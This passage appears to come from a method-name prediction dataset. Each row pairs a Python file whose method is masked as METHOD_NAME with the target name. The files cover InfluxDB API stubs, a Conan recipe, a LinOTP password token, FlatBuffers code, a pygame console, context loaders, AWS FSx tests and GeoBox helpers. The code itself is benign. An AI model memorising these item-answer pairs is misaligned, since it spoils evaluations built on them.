def delete_dashboards_id_members_id(self, user_id, dashboard_id, **kwargs): ...
def delete_dashboards_id_members_id_with_http_info(self, user_id, dashboard_id, **kwargs): ...
async def delete_dashboards_id_members_id_async(self, user_id, dashboard_id, **kwargs): ...
def delete_dashboards_id_owners_id(self, user_id, dashboard_id, **kwargs): ...
def delete_dashboards_id_owners_id_with_http_info(self, user_id, dashboard_id, **kwargs): ...
async def delete_dashboards_id_owners_id_async(self, user_id, dashboard_id, **kwargs): ...
def get_dashboards(self, **kwargs): ...
def get_dashboards_with_http_info(self, **kwargs): ...
async def get_dashboards_async(self, **kwargs): ...
def METHOD_NAME(self, dashboard_id, **kwargs): ...
def get_dashboards_id_with_http_info(self, dashboard_id, **kwargs): ...
async def get_dashboards_id_async(self, dashboard_id, **kwargs): ...
def get_dashboards_id_cells_id_view(self, dashboard_id, cell_id, **kwargs): ...
def get_dashboards_id_cells_id_view_with_http_info(self, dashboard_id, cell_id, **kwargs): ...
async def get_dashboards_id_cells_id_view_async(self, dashboard_id, cell_id, **kwargs): ...
def get_dashboards_id_labels(self, dashboard_id, **kwargs): ...
def get_dashboards_id_labels_with_http_info(self, dashboard_id, **kwargs): ...
async def get_dashboards_id_labels_async(self, dashboard_id, **kwargs): ...
def get_dashboards_id_members(self, dashboard_id, **kwargs): ...
def get_dashboards_id_members_with_http_info(self, dashboard_id, **kwargs): ...
async def get_dashboards_id_members_async(self, dashboard_id, **kwargs): ...
def get_dashboards_id_owners(self, dashboard_id, **kwargs): ...
def get_dashboards_id_owners_with_http_info(self, dashboard_id, **kwargs): ...
async def get_dashboards_id_owners_async(self, dashboard_id, **kwargs): ...
def patch_dashboards_id(self, dashboard_id, **kwargs): ...
def patch_dashboards_id_with_http_info(self, dashboard_id, **kwargs): ...
async def patch_dashboards_id_async(self, dashboard_id, **kwargs): ...
def patch_dashboards_id_cells_id(self, dashboard_id, cell_id, cell_update, **kwargs): ...
def patch_dashboards_id_cells_id_with_http_info(self, dashboard_id, cell_id, cell_update, **kwargs): ...
async def patch_dashboards_id_cells_id_async(self, dashboard_id, cell_id, cell_update, **kwargs): ...
def patch_dashboards_id_cells_id_view(self, dashboard_id, cell_id, view, **kwargs): ...
def patch_dashboards_id_cells_id_view_with_http_info(self, dashboard_id, cell_id, view, **kwargs): ...
async def patch_dashboards_id_cells_id_view_async(self, dashboard_id, cell_id, view, **kwargs): ...
def post_dashboards(self, create_dashboard_request, **kwargs): ...
def post_dashboards_with_http_info(self, create_dashboard_request, **kwargs): ...
async def post_dashboards_async(self, create_dashboard_request, **kwargs): ...
def post_dashboards_id_cells(self, dashboard_id, create_cell, **kwargs): ...
def post_dashboards_id_cells_with_http_info(self, dashboard_id, create_cell, **kwargs): ...
async def post_dashboards_id_cells_async(self, dashboard_id, create_cell, **kwargs): ...
def post_dashboards_id_labels(self, dashboard_id, label_mapping, **kwargs): ...
def post_dashboards_id_labels_with_http_info(self, dashboard_id, label_mapping, **kwargs): ...
async def post_dashboards_id_labels_async(self, dashboard_id, label_mapping, **kwargs): ...
def post_dashboards_id_members(self, dashboard_id, add_resource_member_request_body, **kwargs): ...
def post_dashboards_id_members_with_http_info(self, dashboard_id, add_resource_member_request_body, **kwargs): ...
async def post_dashboards_id_members_async(self, dashboard_id, add_resource_member_request_body, **kwargs): ...
def post_dashboards_id_owners(self, dashboard_id, add_resource_member_request_body, **kwargs): ...
def post_dashboards_id_owners_with_http_info(self, dashboard_id, add_resource_member_request_body, **kwargs): ...
async def post_dashboards_id_owners_async(self, dashboard_id, add_resource_member_request_body, **kwargs): ...
def put_dashboards_id_cells(self, dashboard_id, cell, **kwargs): ...
def put_dashboards_id_cells_with_http_info(self, dashboard_id, cell, **kwargs): ...
async def put_dashboards_id_cells_async(self, dashboard_id, cell, **kwargs): ... |
298,423 | source | from conan import ConanFile
from conan.tools.cmake import CMake, CMakeToolchain,CMakeDeps, cmake_layout
from conan.tools.files import copy, get
from conan.tools.build import check_min_cppstd
from conan.errors import ConanInvalidConfiguration
from conan.tools.scm import Version
import os
required_conan_version = ">=1.53.0"
class ClickHouseCppConan(ConanFile):
name = "clickhouse-cpp"
description = "ClickHouse C++ API"
license = "Apache-2.0"
url = "https://github.com/conan-io/conan-center-index"
homepage = "https://github.com/ClickHouse/clickhouse-cpp"
topics = ("database", "db", "clickhouse")
package_type = "library"
settings = "os", "arch", "compiler", "build_type"
options = {
"shared": [True, False],
"fPIC": [True, False],
"with_openssl": [True, False],
}
default_options = {
"shared": False,
"fPIC": True,
"with_openssl": False,
}
@property
def _min_cppstd(self):
return "17"
@property
def _compilers_minimum_version(self):
return {
"Visual Studio": "15",
"msvc": "191",
"gcc": "7",
"clang": "6",
}
@property
def _requires_compiler_rt(self):
return self.settings.compiler == "clang" and \
((self.settings.compiler.libcxx in ["libstdc++", "libstdc++11"] and not self.options.shared) or \
self.settings.compiler.libcxx == "libc++")
def config_options(self):
if self.settings.os == "Windows":
del self.options.fPIC
def configure(self):
if self.options.shared:
self.options.rm_safe("fPIC")
def layout(self):
cmake_layout(self, src_folder="src")
def requirements(self):
self.requires("lz4/1.9.4")
self.requires("abseil/20230125.3", transitive_headers=True)
self.requires("cityhash/cci.20130801")
if self.options.with_openssl:
self.requires("openssl/[>=1.1 <4]")
def validate(self):
if self.settings.compiler.get_safe("cppstd"):
check_min_cppstd(self, self._min_cppstd)
minimum_version = self._compilers_minimum_version.get(str(self.settings.compiler), False)
if minimum_version and Version(self.settings.compiler.version) < minimum_version:
raise ConanInvalidConfiguration(f"{self.ref} requires C++{self._min_cppstd}, which your compiler does not support.")
if self.settings.os == "Windows" and self.options.shared:
raise ConanInvalidConfiguration(f"{self.ref} does not support shared library on Windows.")
# look at https://github.com/ClickHouse/clickhouse-cpp/pull/226
def METHOD_NAME(self):
get(self, **self.conan_data["sources"][self.version], strip_root=True)
def generate(self):
tc = CMakeToolchain(self)
tc.cache_variables["BUILD_SHARED_LIBS"] = self.options.shared
tc.cache_variables["WITH_OPENSSL"] = self.options.with_openssl
tc.cache_variables["WITH_SYSTEM_ABSEIL"] = True
tc.cache_variables["WITH_SYSTEM_LZ4"] = True
tc.cache_variables["WITH_SYSTEM_CITYHASH"] = True
tc.generate()
cd = CMakeDeps(self)
cd.generate()
def build(self):
cmake = CMake(self)
cmake.configure()
cmake.build()
def package(self):
copy(self, "LICENSE", src=self.source_folder, dst=os.path.join(self.package_folder, "licenses"))
cmake = CMake(self)
cmake.install()
def package_info(self):
self.cpp_info.libs.append("clickhouse-cpp-lib")
self.cpp_info.set_property("cmake_target_name", "clickhouse-cpp-lib::clickhouse-cpp-lib")
if self._requires_compiler_rt:
ldflags = ["--rtlib=compiler-rt"]
self.cpp_info.exelinkflags = ldflags
self.cpp_info.sharedlinkflags = ldflags
self.cpp_info.system_libs.append("gcc_s")
if self.settings.os == 'Windows':
self.cpp_info.system_libs = ['ws2_32', 'wsock32']
# TODO: to remove in conan v2 once cmake_find_package_* generators removed
self.cpp_info.filenames["cmake_find_package"] = "clickhouse-cpp"
self.cpp_info.filenames["cmake_find_package_multi"] = "clickhouse-cpp"
self.cpp_info.names["cmake_find_package"] = "clickhouse-cpp-lib"
self.cpp_info.names["cmake_find_package_multi"] = "clickhouse-cpp-lib" |
298,424 | get class type | # -*- coding: utf-8 -*-
#
# LinOTP - the open source solution for two factor authentication
# Copyright (C) 2010-2019 KeyIdentity GmbH
# Copyright (C) 2019- netgo software GmbH
#
# This file is part of LinOTP server.
#
# This program is free software: you can redistribute it and/or
# modify it under the terms of the GNU Affero General Public
# License, version 3, as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the
# GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
#
# E-mail: info@linotp.de
# Contact: www.linotp.org
# Support: www.linotp.de
#
""" This file containes PasswordTokenClass """
import logging
from linotp.lib.crypto import utils
from linotp.lib.error import ParameterError
from linotp.tokens import tokenclass_registry
from linotp.tokens.base import TokenClass
from linotp.tokens.hmactoken import HmacTokenClass
log = logging.getLogger(__name__)
###############################################
@tokenclass_registry.class_entry("pw")
@tokenclass_registry.class_entry(
"linotp.tokens.passwordtoken.PasswordTokenClass"
)
class PasswordTokenClass(HmacTokenClass):
"""
This Token does use a static Password as the OTP value.
In addition, the OTP PIN can be used with this token.
This Token can be used for a scenario like losttoken
"""
def __init__(self, aToken):
TokenClass.__init__(self, aToken)
self.hKeyRequired = True
self.setType("pw")
@classmethod
def METHOD_NAME(cls):
return "pw"
@classmethod
def getClassPrefix(cls):
return "kipw"
@classmethod
def getClassInfo(cls, key=None, ret="all"):
"""
getClassInfo - returns a subtree of the token definition
:param key: subsection identifier
:type key: string
:param ret: default return value, if nothing is found
:type ret: user defined
:return: subsection if key exists or user defined
:rtype: s.o.
"""
res = {
"type": "pw",
"title": "Password Token",
"description": (
"A token with a fixed password. Can be combined "
"with the OTP PIN. Is used for the lost token "
"scenario."
),
"init": {
"page": {
"html": "passwordtoken.mako",
"scope": "enroll",
},
"title": {
"html": "passwordtoken.mako",
"scope": "enroll.title",
},
},
"config": {
"page": {
"html": "passwordtoken.mako",
"scope": "config",
},
"title": {
"html": "passwordtoken.mako",
"scope": "config.title",
},
},
"selfservice": {
"enroll": {
"page": {
"html": "passwordtoken.mako",
"scope": "selfservice.enroll",
},
"title": {
"html": "passwordtoken.mako",
"scope": "selfservice.title.enroll",
},
},
},
"policy": {},
}
if key and key in res:
ret = res.get(key)
else:
if ret == "all":
ret = res
return ret
def update(self, param):
"""
update - the api, which is called during the token enrollment
we have to make sure that the otpkey, which carries our password
is encoded as utf-8 to not break the storing
:raises: otpkey contains the password and is required therefore
otherewise raises ParameterError
"""
if "otpkey" not in param:
raise ParameterError("Missing Parameter 'otpkey'!")
TokenClass.update(self, param)
TokenClass.setOtpLen(self, len(param["otpkey"]))
def setOtpKey(self, otpKey, reset_failcount=True):
"""
the seed / secret for the password token contains the unix hashed
(hmac256) format of the password. the iv is used as indicator that
we are using the new format, which is the ':1:' indicator
:param otpKey: the token seed / secret
:param reset_failcount: boolean, if the failcounter should be reseted
"""
password_hash = utils.crypt_password(otpKey).encode("utf-8")
self.token.set_encrypted_seed(
password_hash, b":1:", reset_failcount=reset_failcount
)
def validate_seed(self, seed):
"""
Accepts every seed because password token has no restrictions.
This overrides the hmactoken's seed validation (only hex).
:param seed: a string that should be checked for
validity as a seed (aka otpkey)
"""
pass
def checkOtp(self, anOtpVal, counter, window, options=None):
"""
checks the static password - using the secret object password
comparison method
:param anOtpVal: the password to be compared
:param counter: - not used for the password token -
:param window: - not used for the password token -
:param options: - not used for the password token -
:return: counter, which is 0 for success and -1 for failure
"""
secObj = self._get_secret_object()
if secObj.compare_password(anOtpVal):
return 0
return -1
def check_otp_exist(self, otp, window=10, user=None, autoassign=False):
return self.checkOtp(otp, counter=None, window=None)
# eof # |
298,425 | sub graph add name | # automatically generated by the FlatBuffers compiler, do not modify
# namespace: onert_tflite
import flatbuffers
class SubGraph(object):
__slots__ = ['_tab']
@classmethod
def GetRootAsSubGraph(cls, buf, offset):
n = flatbuffers.encode.Get(flatbuffers.packer.uoffset, buf, offset)
x = SubGraph()
x.Init(buf, n + offset)
return x
# SubGraph
def Init(self, buf, pos):
self._tab = flatbuffers.table.Table(buf, pos)
# SubGraph
def Tensors(self, j):
o = flatbuffers.number_types.UOffsetTFlags.py_type(self._tab.Offset(4))
if o != 0:
x = self._tab.Vector(o)
x += flatbuffers.number_types.UOffsetTFlags.py_type(j) * 4
x = self._tab.Indirect(x)
from .Tensor import Tensor
obj = Tensor()
obj.Init(self._tab.Bytes, x)
return obj
return None
# SubGraph
def TensorsLength(self):
o = flatbuffers.number_types.UOffsetTFlags.py_type(self._tab.Offset(4))
if o != 0:
return self._tab.VectorLen(o)
return 0
# SubGraph
def Inputs(self, j):
o = flatbuffers.number_types.UOffsetTFlags.py_type(self._tab.Offset(6))
if o != 0:
a = self._tab.Vector(o)
return self._tab.Get(
flatbuffers.number_types.Int32Flags,
a + flatbuffers.number_types.UOffsetTFlags.py_type(j * 4))
return 0
# SubGraph
def InputsAsNumpy(self):
o = flatbuffers.number_types.UOffsetTFlags.py_type(self._tab.Offset(6))
if o != 0:
return self._tab.GetVectorAsNumpy(flatbuffers.number_types.Int32Flags, o)
return 0
# SubGraph
def InputsLength(self):
o = flatbuffers.number_types.UOffsetTFlags.py_type(self._tab.Offset(6))
if o != 0:
return self._tab.VectorLen(o)
return 0
# SubGraph
def Outputs(self, j):
o = flatbuffers.number_types.UOffsetTFlags.py_type(self._tab.Offset(8))
if o != 0:
a = self._tab.Vector(o)
return self._tab.Get(
flatbuffers.number_types.Int32Flags,
a + flatbuffers.number_types.UOffsetTFlags.py_type(j * 4))
return 0
# SubGraph
def OutputsAsNumpy(self):
o = flatbuffers.number_types.UOffsetTFlags.py_type(self._tab.Offset(8))
if o != 0:
return self._tab.GetVectorAsNumpy(flatbuffers.number_types.Int32Flags, o)
return 0
# SubGraph
def OutputsLength(self):
o = flatbuffers.number_types.UOffsetTFlags.py_type(self._tab.Offset(8))
if o != 0:
return self._tab.VectorLen(o)
return 0
# SubGraph
def Operators(self, j):
o = flatbuffers.number_types.UOffsetTFlags.py_type(self._tab.Offset(10))
if o != 0:
x = self._tab.Vector(o)
x += flatbuffers.number_types.UOffsetTFlags.py_type(j) * 4
x = self._tab.Indirect(x)
from .Operator import Operator
obj = Operator()
obj.Init(self._tab.Bytes, x)
return obj
return None
# SubGraph
def OperatorsLength(self):
o = flatbuffers.number_types.UOffsetTFlags.py_type(self._tab.Offset(10))
if o != 0:
return self._tab.VectorLen(o)
return 0
# SubGraph
def Name(self):
o = flatbuffers.number_types.UOffsetTFlags.py_type(self._tab.Offset(12))
if o != 0:
return self._tab.String(o + self._tab.Pos)
return None
def SubGraphStart(builder):
builder.StartObject(5)
def SubGraphAddTensors(builder, tensors):
builder.PrependUOffsetTRelativeSlot(
0, flatbuffers.number_types.UOffsetTFlags.py_type(tensors), 0)
def SubGraphStartTensorsVector(builder, numElems):
return builder.StartVector(4, numElems, 4)
def SubGraphAddInputs(builder, inputs):
builder.PrependUOffsetTRelativeSlot(
1, flatbuffers.number_types.UOffsetTFlags.py_type(inputs), 0)
def SubGraphStartInputsVector(builder, numElems):
return builder.StartVector(4, numElems, 4)
def SubGraphAddOutputs(builder, outputs):
builder.PrependUOffsetTRelativeSlot(
2, flatbuffers.number_types.UOffsetTFlags.py_type(outputs), 0)
def SubGraphStartOutputsVector(builder, numElems):
return builder.StartVector(4, numElems, 4)
def SubGraphAddOperators(builder, operators):
builder.PrependUOffsetTRelativeSlot(
3, flatbuffers.number_types.UOffsetTFlags.py_type(operators), 0)
def SubGraphStartOperatorsVector(builder, numElems):
return builder.StartVector(4, numElems, 4)
def METHOD_NAME(builder, name):
builder.PrependUOffsetTRelativeSlot(
4, flatbuffers.number_types.UOffsetTFlags.py_type(name), 0)
def SubGraphEnd(builder):
return builder.EndObject() |
298,426 | scroll | import pygame as pg
from .fastfont import Fastfont
black = (0, 0, 0)
white = (255,255,255)
darkgrey = (25, 25, 48)
grey = (84, 84, 114)
darkblue = (25, 25, 64, 100)
white = (255, 255, 255)
green = (0, 255, 0)
blue = (0, 0, 255)
red = (255, 0, 0)
lightgreyblue = (130, 150, 190) # waypoint symbol color
lightgreygreen = (149, 215, 179) # grid color
lightcyan = (0, 255, 255) # FIR boundaries
amber = (255,163,71) # Conflicting aircraft
magenta = (255,0,255) # Used for route
class Console:
"""
Console (aka EditWin) class definition : Edit window & console class
Methods:
echo(msg) : Print a message
insert(message) : insert characters in current edit line
backspace() : process backspace
getline() : return current edit line
enter() : enter, end of edit line
scroll() : scroll up one line
update() : redraw update bitmap of edit window
Created by : Jacco M. Hoekstra (TU Delft)
"""
def __init__(self,win,nch,nlin,winx,winy):
# Was Helvetica,14
self.fontedit = Fastfont(win,'Courier New',14,white,False,False) # name, size, bold,italic
# Edit window: 6 line of 64 chars
self.content = []
self.nch = nch # number of chars per line
self.nlin = nlin # number of lines in windows
self.winx = winx # x-coordinate in pixels of left side
self.winy = winy - self.nlin*self.fontedit.linedy # y-coordinate in pixels of top
self.msg = [] # Messages in edit window
for i in range(self.nlin):
line= self.nch*[' ']
self.content.append(line)
self.content0 = self.content
self.xcursor = 0
self.xedit = 0
# self.printeditwin('Testing 1,2,3')
self.bmpdy = self.nlin*self.fontedit.linedy
self.bmpdx = int(self.nch*self.fontedit.linedy*10/17) + 2 # Guess max aspect ratio
self.bmp = pg.Surface([self.bmpdx,self.bmpdy],
pg.SRCALPHA, 32)
self.bmp.fill(darkblue)
self.rect = pg.Rect(self.winx,self.winy,
self.bmpdx,self.bmpdy)
self.redraw = True
return
def echo(self,msg):
"""print a message to console window"""
if self.xedit==self.xcursor:
self.insert(msg)
j = int(self.xcursor/self.nch)
self.xcursor = (j+1)*self.nch
self.xedit = self.xcursor
# Check for End of window
if self.xedit >= (self.nch-1)*(self.nlin-1):
del self.content[0]
self.content.append(self.nch*[' '])
self.xcursor = j*self.nch
self.xedit = self.xcursor
else:
self.msg.append(msg) # buffer
return
def insert(self,message):
i = self.xcursor%self.nch
j = int(self.xcursor/self.nch)
for ich in range(len(message)):
self.content[j][i]=message[ich]
i = i+1
# Check for end-of line
if i>=self.nch:
i = 0
j = j+1
# Check for end-of edit window
if j>=self.nlin:
self.METHOD_NAME()
j = j-1
self.xcursor = j*self.nch+i
self.redraw = True
return
def backspace(self):
if self.xcursor>self.xedit:
self.xcursor = self.xcursor-1
self.redraw = True
i = self.xcursor%self.nch
j = int(self.xcursor/self.nch)
self.content[j][i]=" "
return
def getline(self): # enter was pressed ro we need current command line
line = ""
for idx in range(self.xedit,self.xcursor):
i = idx%self.nch
j = int(idx/self.nch)
line = line+self.content[j][i]
return line
def enter(self):
j = int(self.xcursor/self.nch)
self.xcursor = (j+1)*self.nch
self.xedit = self.xcursor
# End of window
if self.xedit >= (self.nch-1)*(self.nlin-1):
del self.content[0]
self.content.append(self.nch*[' '])
self.xcursor = j*self.nch
self.xedit = self.xcursor
# Print buffered messages
self.redraw = True
while len(self.msg)>0:
self.echo(self.msg[0]) # No endless recursion becasue xedit==xcursor
del self.msg[0]
return
def METHOD_NAME(self):
"""Scroll window"""
del self.content[0]
self.content.append(self.nch*[' '])
self.xcursor = self.xcursor-self.nch
self.xedit = self.xedit-self.nch
def update(self):
"""Update: Draw a new frame"""
# Draw edit window
if self.redraw:
self.bmp.fill(darkgrey)
for j in range(self.nlin):
for i in range(self.nch):
if True or self.content[j][i] != self.content0[j][i]:
x = i*int(self.fontedit.linedy*10/17) + 1
y = j*self.fontedit.linedy+int(self.fontedit.linedy/6)
self.fontedit.printat(self.bmp,
x,y,
self.content[j][i])
self.content0[j][i]=self.content[j][i]
# Draw cursor
i = self.xcursor%self.nch
j = int(self.xcursor/self.nch)
x = i*int(self.fontedit.linedy*10/17)
y = j*self.fontedit.linedy+int(self.fontedit.linedy/6)
self.fontedit.printat(self.bmp,x,y,"_")
self.bmp.set_alpha(127)
self.redraw = False
return |
298,427 | update with override context | import os
import json
import logging
import copy
from postgresqleu.util.context_processors import settings_context
try:
import yaml
_has_yaml = True
except ImportError:
_has_yaml = False
# XXX: keep in sync with deploystatic.py!
def deep_update_context(target, source):
for k, v in source.items():
if type(v) == dict:
# If this is a dict stored in the dict
if k not in target:
# Target didn't have it, so copy it over
target[k] = copy.deepcopy(v)
elif type(target[k]) != dict:
# Target had something but it's not a dict, so overwrite it
target[k] = copy.deepcopy(v)
else:
deep_update_context(target[k], v)
else:
target[k] = copy.copy(v)
def _load_context_file(filename, ignore_exceptions=True):
try:
with open(filename, encoding='utf8') as f:
if filename.endswith('.json'):
return json.load(f)
else:
return yaml.safe_load(f)
except ValueError as e:
# Malformatted JSON -- pass it through as an exception
raise
except Exception:
if not ignore_exceptions:
raise
return {}
def load_base_context(rootdir):
c = {}
if os.path.isfile(os.path.join(rootdir, 'templates/context.json')):
deep_update_context(c, _load_context_file(os.path.join(rootdir, 'templates/context.json')))
if _has_yaml and os.path.isfile(os.path.join(rootdir, 'templates/context.yaml')):
deep_update_context(c, _load_context_file(os.path.join(rootdir, 'templates/context.yaml')))
return c
def load_override_context(rootdir):
# Load contexts in override directory, if any
c = {}
if os.path.isdir(os.path.join(rootdir, 'templates/context.override.d')):
for fn in sorted(os.listdir(os.path.join(rootdir, 'templates/context.override.d'))):
if fn.endswith('.json') or (_has_yaml and fn.endswith('.yaml')):
try:
deep_update_context(c, _load_context_file(os.path.join(rootdir, 'templates/context.override.d', fn), False))
except Exception as e:
logging.getLogger(__name__).warning(
'Failed to load context file {}: {}'.format(os.path.join(rootdir, 'templates/context.override.d', fn), e)
)
return c
def METHOD_NAME(context, rootdir):
deep_update_context(context, load_override_context(rootdir))
# Locate the git revision for a repository in the given path, including
# walking up the tree to find it if the specified path is not the root.
def find_git_revision(path):
while path != '/':
if os.path.exists(os.path.join(path, ".git/HEAD")):
# Found it!
with open(os.path.join(path, '.git/HEAD')) as f:
ref = f.readline().strip()
if not ref.startswith('ref: refs/heads/'):
return None
refname = os.path.join(path, ".git/", ref[5:])
if not os.path.isfile(refname):
return None
with open(refname) as f:
fullref = f.readline()
return fullref[:7]
elif os.path.exists(os.path.join(path, ".deploystatic_githash")):
with open(os.path.join(path, ".deploystatic_githash")) as f:
return f.readline().strip()
# Else step up one level
path = os.path.dirname(path)
# If no direct git hash found, search for a deploystatic file
return None
def load_all_context(conference, inject, dictionary=None):
if conference and conference.jinjaenabled and conference.jinjadir:
try:
c = load_base_context(conference.jinjadir)
except ValueError as e:
return HttpResponse("JSON parse failed: {0}".format(e), content_type="text/plain")
else:
c = {}
c.update(inject)
if conference and conference.jinjaenabled and conference.jinjadir:
c['githash'] = find_git_revision(conference.jinjadir)
if dictionary:
c.update(dictionary)
if conference and conference.jinjaenabled and conference.jinjadir:
METHOD_NAME(c, conference.jinjadir)
c.update(settings_context())
return c |
298,428 | test describe volumes | # Copyright 2022 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"). You may not use this file except in compliance
# with the License. A copy of the License is located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the "LICENSE.txt" file accompanying this file. This file is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES
# OR CONDITIONS OF ANY KIND, express or implied. See the License for the specific language governing permissions and
# limitations under the License.
import pytest
from assertpy import assert_that
from pcluster.aws.aws_api import AWSApi
from tests.utils import MockedBoto3Request
@pytest.fixture()
def boto3_stubber_path():
return "pcluster.aws.common.boto3"
def get_describe_file_systems_mocked_request(fsxs, lifecycle):
return MockedBoto3Request(
method="describe_file_systems",
response={"FileSystems": [{"FileSystemId": fsx, "Lifecycle": lifecycle} for fsx in fsxs]},
expected_params={"FileSystemIds": fsxs},
)
def test_get_file_systems_info(boto3_stubber):
fsx = "fs-12345678"
additional_fsx = "fs-23456789"
# The first mocked request and the third are about the same fsx. However, the lifecycle of the fsx changes
# from CREATING to AVAILABLE. The second mocked request is about another fsx
mocked_requests = [
get_describe_file_systems_mocked_request([fsx], "CREATING"),
get_describe_file_systems_mocked_request([additional_fsx], "CREATING"),
get_describe_file_systems_mocked_request([fsx], "AVAILABLE"),
]
boto3_stubber("fsx", mocked_requests)
assert_that(AWSApi.instance().fsx.get_file_systems_info([fsx])[0].file_storage_info["Lifecycle"]).is_equal_to(
"CREATING"
)
# Second boto3 call with more fsxs. The fsx already cached should not be included in the boto3 call.
response = AWSApi.instance().fsx.get_file_systems_info([fsx, additional_fsx])
assert_that(response).is_length(2)
# Third boto3 call. The result should be from cache even if the lifecycle of the fsx is different
assert_that(AWSApi.instance().fsx.get_file_systems_info([fsx])[0].file_storage_info["Lifecycle"]).is_equal_to(
"CREATING"
)
# Fourth boto3 call after resetting the AWSApi instance. The latest fsx lifecycle should be retrieved from boto3
AWSApi.reset()
assert_that(AWSApi.instance().fsx.get_file_systems_info([fsx])[0].file_storage_info["Lifecycle"]).is_equal_to(
"AVAILABLE"
)
def get_describe_storage_virtual_machines_mocked_request(svms, lifecycle):
return MockedBoto3Request(
method="describe_storage_virtual_machines",
response={"StorageVirtualMachines": [{"StorageVirtualMachineId": svm, "Lifecycle": lifecycle} for svm in svms]},
expected_params={"StorageVirtualMachineIds": svms},
)
def test_describe_storage_virtual_machines(boto3_stubber):
svm = "svm-12345678901234567"
additional_svm = "svm-23456789012345678"
# The first mocked request and the third are about the same SVM. However, the lifecycle of the fsx changes
# from CREATING to CREATED. The second mocked request is about another SVM
mocked_requests = [
get_describe_storage_virtual_machines_mocked_request([svm], "CREATING"),
get_describe_storage_virtual_machines_mocked_request([additional_svm], "CREATING"),
get_describe_storage_virtual_machines_mocked_request([svm], "CREATED"),
]
boto3_stubber("fsx", mocked_requests)
assert_that(AWSApi.instance().fsx.describe_storage_virtual_machines([svm])[0]["Lifecycle"]).is_equal_to("CREATING")
# Second boto3 call with more SVMs. The SVM already cached should not be included in the boto3 call.
response = AWSApi.instance().fsx.describe_storage_virtual_machines([svm, additional_svm])
assert_that(response).is_length(2)
# Third boto3 call. The result should be from cache even if the lifecycle of the SVM is different
assert_that(AWSApi.instance().fsx.describe_storage_virtual_machines([svm])[0]["Lifecycle"]).is_equal_to("CREATING")
# Fourth boto3 call after resetting the AWSApi instance. The latest fsx lifecycle should be retrieved from boto3
AWSApi.reset()
assert_that(AWSApi.instance().fsx.describe_storage_virtual_machines([svm])[0]["Lifecycle"]).is_equal_to("CREATED")
def get_describe_volumes_mocked_request(volumes, lifecycle):
return MockedBoto3Request(
method="describe_volumes",
response={"Volumes": [{"VolumeId": volume, "Lifecycle": lifecycle} for volume in volumes]},
expected_params={"VolumeIds": volumes},
)
def METHOD_NAME(boto3_stubber):
volume = "fsvol-12345678901234567"
additional_volume = "fsvol-23456789012345678"
# The first mocked request and the third are about the same volume. However, the lifecycle of the fsx changes
# from CREATING to CREATED. The second mocked request is about another volume
mocked_requests = [
get_describe_volumes_mocked_request([volume], "CREATING"),
get_describe_volumes_mocked_request([additional_volume], "CREATING"),
get_describe_volumes_mocked_request([volume], "CREATED"),
]
boto3_stubber("fsx", mocked_requests)
assert_that(AWSApi.instance().fsx.describe_volumes([volume])[0]["Lifecycle"]).is_equal_to("CREATING")
# Second boto3 call with more volumes. The volume already cached should not be included in the boto3 call.
response = AWSApi.instance().fsx.describe_volumes([volume, additional_volume])
assert_that(response).is_length(2)
# Third boto3 call. The result should be from cache even if the lifecycle of the SVM is different
assert_that(AWSApi.instance().fsx.describe_volumes([volume])[0]["Lifecycle"]).is_equal_to("CREATING")
# Fourth boto3 call after resetting the AWSApi instance. The latest fsx lifecycle should be retrieved from boto3
AWSApi.reset()
assert_that(AWSApi.instance().fsx.describe_volumes([volume])[0]["Lifecycle"]).is_equal_to("CREATED")
def get_describe_file_caches_mocked_request(file_cache_ids):
return MockedBoto3Request(
method="describe_file_caches",
response={"FileCaches": [{"FileCacheId": file_cache_id} for file_cache_id in file_cache_ids]},
expected_params={"FileCacheIds": file_cache_ids},
)
def test_describe_file_caches(boto3_stubber):
file_cache_id = "fc-12345678"
additional_file_cache_id = "fc-123456789012345678"
# The first mocked request is to check that the data is cached. The second mocked request is about another FC
mocked_requests = [
get_describe_file_caches_mocked_request([file_cache_id]),
get_describe_file_caches_mocked_request([additional_file_cache_id]),
]
boto3_stubber("fsx", mocked_requests)
AWSApi.instance().fsx.describe_file_caches([file_cache_id])
# Second boto3 call with more FileCaches. The FC already cached should not be included in the boto3 call.
assert_that(AWSApi.instance().fsx.fc_cache).contains(file_cache_id)
assert_that(AWSApi.instance().fsx.fc_cache).does_not_contain(additional_file_cache_id)
response = AWSApi.instance().fsx.describe_file_caches([file_cache_id, additional_file_cache_id])
assert_that(AWSApi.instance().fsx.fc_cache).contains(file_cache_id, additional_file_cache_id)
assert_that(response).is_length(2) |
298,429 | tiles | # This file is part of the Open Data Cube, see https://opendatacube.org for more information
#
# Copyright (c) 2015-2023 ODC Contributors
# SPDX-License-Identifier: Apache-2.0
""" Geometric operations on GeoBox class
"""
from typing import Dict, Optional, Tuple, Iterable
import itertools
import math
from affine import Affine
from . import Geometry, GeoBox, BoundingBox
from .tools import align_up
from datacube.utils.math import clamp
# pylint: disable=invalid-name
MaybeInt = Optional[int]
MaybeFloat = Optional[float]
def flipy(gbox: GeoBox) -> GeoBox:
"""
:returns: GeoBox covering the same region but with Y-axis flipped
"""
H, W = gbox.shape
A = Affine.translation(0, H)*Affine.scale(1, -1)
A = gbox.affine*A
return GeoBox(W, H, A, gbox.crs)
def flipx(gbox: GeoBox) -> GeoBox:
"""
:returns: GeoBox covering the same region but with X-axis flipped
"""
H, W = gbox.shape
A = Affine.translation(W, 0)*Affine.scale(-1, 1)
A = gbox.affine*A
return GeoBox(W, H, A, gbox.crs)
def translate_pix(gbox: GeoBox, tx: float, ty: float) -> GeoBox:
"""
Shift GeoBox in pixel plane. (0,0) of the new GeoBox will be at the same
location as pixel (tx, ty) in the original GeoBox.
"""
H, W = gbox.shape
A = gbox.affine*Affine.translation(tx, ty)
return GeoBox(W, H, A, gbox.crs)
def pad(gbox: GeoBox, padx: int, pady: MaybeInt = None) -> GeoBox:
"""
Expand GeoBox by fixed number of pixels on each side
"""
pady = padx if pady is None else pady
H, W = gbox.shape
A = gbox.affine*Affine.translation(-padx, -pady)
return GeoBox(W + padx*2, H + pady*2, A, gbox.crs)
def pad_wh(gbox: GeoBox,
alignx: int = 16,
aligny: MaybeInt = None) -> GeoBox:
"""
